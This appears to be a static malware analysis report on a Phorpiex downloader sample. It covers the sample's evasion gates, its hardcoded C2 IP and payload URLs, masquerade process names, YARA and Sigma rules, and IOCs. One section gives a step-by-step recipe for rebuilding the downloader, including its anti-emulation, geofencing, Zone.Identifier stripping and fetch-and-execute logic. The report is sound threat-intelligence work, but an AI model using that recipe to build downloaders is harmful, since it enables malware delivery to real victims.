typeanalysisfamilyphorpiexconfidencemediumcreated2026-08-27updated2026-08-27malware-familyloaderc2defense-evasionpersistencemitre-attckpe
SHA-256: 0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3

phorpiex: 0371fbbf — Business-app masquerade downloader sibling (May 29 2026 build)

Executive Summary

A 113 KB MSVC 9.0 PE32 GUI downloader compiled 2026-05-29, three days after the first confirmed business-app masquerade sibling (9570038453). Shares the same C2 (178.16.54.109), the same six hardcoded masquerade process names (slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe), the same %TEMP%\w4f4wffwf.txt marker-file gate, and the same Chrome/7775543322.0.0.0 fake UA. Delta: adds lkdomain.exe as a primary payload URL and ten sequentially-named payloads (lb1.exe–lb10.exe), blending the business-app masquerade pattern with the thin-downloader payload-naming convention observed in earlier Phorpiex siblings. Static-only analysis (CAPE skipped — no Windows guest).

What It Is

Field Value
SHA-256 0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3
Size 113,152 bytes (113 KB) ^[file.txt]
Type PE32 executable (GUI) Intel 80386, 5 sections ^[file.txt]
Linker MSVC 9.0 (MajorLinkerVersion 0x9, Minor 0x0) ^[pefile.txt]
Timestamp 0x6A1965F9 → Fri May 29 10:10:01 2026 UTC ^[pefile.txt]
Subsystem Windows GUI ^[pefile.txt]
Signed No ^[rabin2-info.txt]
ASLR / NX Enabled (DllCharacteristics 0x8140) ^[pefile.txt]
Rich header Present (oRichv8 in strings) ^[strings.txt:3]
CRT Static MSVCR90 (Dinkumware C++ stdlib strings) ^[strings.txt:400]
YARA PE_File_Generic, Suspicious_Wininet_Imports ^[yara.txt]

How It Works

Entry flow

Standard MSVC CRT entry0 → main with SEH frames. main gates execution through a GetTickCount → fcn.00405baa timing loop (anti-emulation) before proceeding to the downloader logic. ^[r2:entry0] ^[r2:main]

Marker-file gate

fcn.004010b0 expands %temp%, constructs %TEMP%\w4f4wffwf.txt, and checks existence via PathFileExistsW. If absent, it creates the file and returns true (1); if present, returns false (0), causing main to skip the download loop. This is a single-instance / sandbox-evasion gate. ^[r2:fcn.004010b0] ^[strings.txt:51]

Geolocation gate

main fetches http://ip-api.com/json/ via WinInet, then parses the JSON response for "countryCode". If the value is "CN", execution aborts. This is an explicit China exclusion gate. ^[r2:main] ^[strings.txt:70] ^[strings.txt:72]

Downloader loop

fcn.00401150 is the core fetch-and-stage routine:

  1. Expands %temp% to a wide path.
  2. Generates a random numeric filename %TEMP%\<rand><rand>.exe via wsprintfW("%s\\%d%d.exe"). ^[r2:fcn.00401150]
  3. Opens a WinInet session with a hardcoded fake UA: Mozilla/5.0 ... Chrome/7775543322.0.0.0 Safari/537.36. ^[strings.txt:51]
  4. Fetches the payload via InternetOpenUrlW + InternetReadFile.
  5. Writes the payload to the temp path via CreateFileW + WriteFile.
  6. Deletes the Zone.Identifier ADS via DeleteFileW("%s:Zone.Identifier") to strip the "downloaded from Internet" mark. ^[r2:fcn.00401150]
  7. Executes the payload via CreateProcessW (with CREATE_UNICODE_ENVIRONMENT | DEBUG_PROCESS? — flag 0x44 observed) falling back to ShellExecuteW("open"). ^[r2:section..text@0x401082]

Payload URL list

Eleven hardcoded HTTP URLs, all pointing to 178.16.54.109:

  • http://178.16.54.109/lkdomain.exe ^[strings.txt:50]
  • http://178.16.54.109/lb1.exe through lb10.exe ^[strings.txt:57-66]

Masquerade execution names

Six hardcoded process names passed as the lpApplicationName / lpFileName parameter to the execution stub:

  • slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe ^[strings.txt:51-56]

These are not the downloaded payload's real name; they are the name under which the dropper launches itself or a companion, likely to poison EDR process-tree telemetry.

Decompiled Behavior

Entry point (entry0 @ 0x00407db1): Standard MSVC 9.0 CRT bootstrap — validates PE magic, initializes _initterm, sets up argv/envp, then calls main. No initterm hijack observed (unlike the older 755bed07 Phorpiex sibling). ^[r2:entry0]

main (0x004016a0):

  • Sleep(2000) → GetTickCount gate → marker-file check (fcn.004010b0) → ip-api fetch → JSON "countryCode" parse → CN exclusion → iterate payload URL table → call downloader (fcn.00401150) for each URL. ^[r2:main]

fcn.00401150 (downloader): WinInet-only fetch (no URLMon fallback, unlike the thin 10 KB stubs). Stages to %TEMP%\<rand><rand>.exe. Strip Zone.Identifier. Launch via CreateProcessW then ShellExecuteW. ^[r2:fcn.00401150]

fcn.00401082 (launcher): Called after download completes. Attempts CreateProcessW with DEBUG_PROCESS flag; on failure falls back to ShellExecuteW("open", ...), then sleeps 1000 ms before returning. ^[r2:section..text@0x401082]

C2 Infrastructure

Indicator Value Provenance
Primary C2 IP 178.16.54.109 ^[strings.txt:50] ^[strings.txt:57-66]
Geolocation API http://ip-api.com/json/ ^[strings.txt:70] ^[strings.txt:75]
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7775543322.0.0.0 Safari/537.36 ^[strings.txt:51]
Payload URLs lkdomain.exe, lb1.exe–lb10.exe ^[strings.txt:50] ^[strings.txt:57-66]
Masquerade names slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe ^[strings.txt:51-56]
Marker file %TEMP%\w4f4wffwf.txt ^[r2:fcn.004010b0]

No domains, no HTTPS, no DGA. Pure cleartext HTTP over a single hardcoded IP.

Interesting Tidbits

  • Builder evolution: Prior thin-downloader siblings (6b8527a7, 025f5798, etc.) used peinf.exe/xmr.exe/xmrget.exe/grab.exe payload names. The business-app masquerade sibling (9570038453) did not list payload URLs in its summary. This sample (0371fbbf) is the first confirmed bridge: it carries the business-app masquerade names and the lb* sequential payload naming convention. The lkdomain.exe URL is new to this campaign window. ^[entities/phorpiex.md]
  • Fake UA version: Chrome/7775543322.0.0.0 — same impossible version as the prior sibling, confirming a shared builder template. ^[strings.txt:51]
  • No URLMon: The 10 KB thin stubs use dual WinInet+URLMon fetch; this 113 KB variant uses WinInet only. The bloat comes from static C++ STL (Dinkumware strings, iostream RTTI) rather than additional functionality. ^[binwalk.txt]
  • Sleep gate: main sleeps 2000 ms and runs a GetTickCount delta check before any network activity — crude anti-emulation. ^[r2:main]
  • CN exclusion: Hardcoded country-code gate excludes China. Common in crimeware to avoid domestic law-enforcement attention. ^[r2:main]

How To Mess With It (Homelab Replication)

Toolchain: MSVC 9.0 (Visual Studio 2008) or compatible MinGW-w64 with -static CRT.

Recipe:

  1. Write a minimal Win32 GUI app in C++ using WinInet APIs (InternetOpenW, InternetOpenUrlW, InternetReadFile).
  2. Hardcode Sleep(2000) + GetTickCount() delta check at main entry.
  3. Implement ExpandEnvironmentStringsW(L"%temp%") + PathFileExistsW(L"w4f4wffwf.txt") gate.
  4. Fetch http://ip-api.com/json/, parse "countryCode", abort if "CN".
  5. Build a wchar_t* URL table pointing to http://<ip>/lb<N>.exe.
  6. Generate random filename with wsprintfW(dst, L"%s\\%d%d.exe", temp, rand(), rand()).
  7. Open WinInet session with InternetOpenW(L"Mozilla/5.0 ... Chrome/7775543322.0.0.0 ...", ...).
  8. Download → CreateFileW → WriteFile → DeleteFileW(L"path:Zone.Identifier") → CreateProcessW / ShellExecuteW(L"open").
  9. Compile with /SUBSYSTEM:WINDOWS /MT (static CRT). Target size should be ~100–120 KB with STL bloat.

Verification: Run capa <repro.exe> — should hit Suspicious_Wininet_Imports and PE_File_Generic.

Deployable Signatures

YARA rule

rule Phorpiex_BusinessAppDownloader_May2026 {
    meta:
        description = "Phorpiex business-app masquerade downloader cluster (May 2026)"
        author = "PacketPursuit SOC"
        date = "2026-08-27"
        hash1 = "0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3"
        hash2 = "9570038453a8b3caa9e7a0af56ef77cee9cfb314c357e62f4350fb99f6afc51f"
    strings:
        $ua = "Chrome/7775543322.0.0.0" ascii wide
        $marker = "w4f4wffwf.txt" ascii wide
        $c2 = "178.16.54.109" ascii wide
        $slack = "slack.exe" ascii wide
        $teams = "Teams.exe" ascii wide
        $zoom = "Zoom.exe" ascii wide
        $sap = "sapgui.exe" ascii wide
        $pbi = "PBIDesktop.exe" ascii wide
        $tableau = "tableau.exe" ascii wide
        $zone = ":Zone.Identifier" ascii wide
        $ipapi = "http://ip-api.com/json/" ascii wide
        $cc = "countryCode" ascii wide
        $cn = "CN" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        filesize < 200KB and
        6 of ($slack, $teams, $zoom, $sap, $pbi, $tableau) and
        ($ua or $marker or $c2)
}

Sigma rule

title: Phorpiex Business-App Masquerade Downloader Execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'slack.exe'
            - 'Teams.exe'
            - 'Zoom.exe'
            - 'sapgui.exe'
            - 'PBIDesktop.exe'
            - 'tableau.exe'
        ParentImage|endswith:
            - '\temp\\'
        Image|endswith:
            - '\temp\\'
    condition: selection
falsepositives:
    - Unlikely — these exact names appearing under %TEMP% with ParentImage also in %TEMP% is a strong signal.
level: high

IOC list

Type Value
SHA-256 0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3
SHA-256 sibling 9570038453a8b3caa9e7a0af56ef77cee9cfb314c357e62f4350fb99f6afc51f
C2 IP 178.16.54.109
Marker file %TEMP%\w4f4wffwf.txt
Fake UA Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7775543322.0.0.0 Safari/537.36
Payload names lkdomain.exe, lb1.exe–lb10.exe
Masquerade names slack.exe, Teams.exe, Zoom.exe, sapgui.exe, PBIDesktop.exe, tableau.exe

Behavioral fingerprint

This binary is a 100–120 KB MSVC 9.0 PE32 GUI executable with static C++ STL bloat. On launch it sleeps 2 seconds, checks for a marker file %TEMP%\w4f4wffwf.txt, queries ip-api.com/json for geolocation, and aborts if the country code is "CN". It then downloads up to eleven payloads over cleartext HTTP from 178.16.54.109 (URLs like /lb<N>.exe and /lkdomain.exe), stages them to %TEMP%\<rand><rand>.exe, strips the Zone.Identifier ADS, and launches them under masquerade process names including slack.exe, Teams.exe, and Zoom.exe. The WinInet session uses a fake Chrome UA with an impossible version string (Chrome/7775543322.0.0.0).

Detection Signatures

Static indicators map to MITRE ATT&CK as follows:

Technique ID Evidence
User Execution T1204.002 Spam-delivered PE with social-engineered filename
Ingress Tool Transfer T1105 HTTP download of secondary payloads ^[strings.txt:50] ^[strings.txt:57-66]
Masquerading T1036 Process launched as slack.exe, Teams.exe, etc. ^[strings.txt:51-56]
Exfiltration Over C2 T1041 HTTP cleartext C2 ^[strings.txt:50]
System Information Discovery T1082 ip-api.com/json geolocation query ^[strings.txt:70]
Geolocation T1617 Country-code gating (countryCode, CN) ^[r2:main]
Defense Evasion::Indicator Removal T1070.004 Zone.Identifier ADS deletion ^[r2:fcn.00401150]
Defense Evasion::Anti-Analysis T1497 GetTickCount timing gate + marker-file single-instance gate ^[r2:main] ^[r2:fcn.004010b0]

References

  • SHA-256: 0371fbbff34ec41ee9ae007482edbcb75f1749661b863da3a2ffe86638cd62a3
  • Sibling analysis: 9570038453a8b3caa9e7a0af56ef77cee9cfb314c357e62f4350fb99f6afc51f
  • Wiki: phorpiex
  • OpenCTI labels: dropped-by-phorpiex, exe, malware-bazaar

Provenance

  • Static artifacts generated by triage-fast (file, exiftool, pefile, strings, yara, ssdeep, tlsh, binwalk, rabin2-info)
  • strings.txt line numbers cited directly
  • pefile.txt for PE header fields
  • rabin2-info.txt for radare2 binary summary
  • Decompilation via radare2 MCP (functions entry0, main, fcn.004010b0, fcn.00401150, fcn.00401082)
  • capa skipped (signature path missing on triage host); floss skipped (CLI arg bug)
  • No CAPE detonation — Windows guest unavailable at time of analysis